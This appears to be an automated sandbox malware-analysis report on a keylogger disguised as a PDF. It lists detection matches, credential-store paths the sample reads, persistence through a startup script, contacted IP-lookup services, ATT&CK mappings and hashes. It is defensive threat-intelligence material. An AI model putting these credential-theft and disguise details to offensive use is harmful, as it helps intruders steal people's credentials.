Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: silvexes.exe	Binary or memory string: WIN_81
Source: silvexes.exe	Binary or memory string: WIN_XP
Source: silvexes.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: silvexes.exe	Binary or memory string: WIN_XPe
Source: silvexes.exe	Binary or memory string: WIN_VISTA
Source: silvexes.exe	Binary or memory string: WIN_7
Source: silvexes.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: silvexes.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: silvexes.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7696, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4120751881.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4121149937.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4120751881.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4121149937.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: silvexes.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: silvexes.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7696, type: MEMORYSTR

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_000D8C4F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_000D923B
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C08C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	1_2_00C08C4F
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C0923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	1_2_00C0923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	3 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	131 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	11 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IMG-20241119-WA0006(162KB).Pdf.exe	26%	ReversingLabs	Win32.Trojan.AutoitInject
IMG-20241119-WA0006(162KB).Pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	26%	ReversingLabs	Win32.Trojan.AutoitInject

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	172.67.177.134	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.75	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E2B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.4120751881.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.75$	RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	silvexes.exe, 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, silvexes.exe, 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.4120751881.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	silvexes.exe, 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, silvexes.exe, 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.122.6.168	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false
172.67.177.134	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562136
Start date and time:	2024-11-25 08:48:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IMG-20241119-WA0006(162KB).Pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 55 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: IMG-20241119-WA0006(162KB).Pdf.exe

Simulations

Behavior and APIs

Time	Type	Description
02:49:04	API Interceptor	14564170x Sleep call for process: RegSvcs.exe modified
07:49:01	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.6.168	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rrequestforquotation.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
172.67.177.134	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	sosoliso.exe	Get hash	malicious	MassLogger RAT	Browse
	rrequestforquotation.exe	Get hash	malicious	Snake Keylogger	Browse
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Papyment_Advice.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
reallyfreegeoip.org	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Papyment_Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	168.139.6.21
	rrequestforquotation.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SOA SEP 2024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	arm5.nn-20241122-0008.elf	Get hash	malicious	Mirai, Okiru	Browse	147.154.211.97
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	https://linktr.ee/priyanka662	Get hash	malicious	Gabagool	Browse	172.67.74.152
	t90RvrDNvz.exe	Get hash	malicious	Unknown	Browse	172.67.204.237
	segura.vbs	Get hash	malicious	Remcos	Browse	172.67.187.200
	asegurar.vbs	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.84.67
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	2Brb1DnRS6.wsf	Get hash	malicious	Unknown	Browse	172.67.204.2
	pm4ozz83c4.vbs	Get hash	malicious	Unknown	Browse	172.67.204.2
	Cargo Invoice_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.191.199

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Papyment_Advice.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134

Process:	C:\Users\user\AppData\Local\Wausaukee\silvexes.exe
File Type:	data
Category:	dropped
Size (bytes):	94986
Entropy (8bit):	7.933213566042837
Encrypted:	false
SSDEEP:	1536:d/uhaAeJWTfyWmou1Cuk+v3mvw1uLp0zLzvxitHwj7OJLliYchjmCcx3Zy5R20:EVUWTfyWm7Civ3mvdpKxi1wGJLliYch1
MD5:	D74CAF592506F2278ABBB1C537A92477
SHA1:	F50CFCD745D4BC23E86A43878EA681F7A683AB6B
SHA-256:	57A4A23B0DA9F533DC8C9D1D8199F653CAD8D93244F322AC60FFEDCD9B118C68
SHA-512:	B183F8C87186D8BE985DADBD401D044A47024457F5AEBDC4E7EF978AD4A32AB9555A40A76DD0DA4020FFC7B1943C5D9EBB03EC4F83F92F7CAEB3B4E23244E82F
Malicious:	false
Reputation:	low
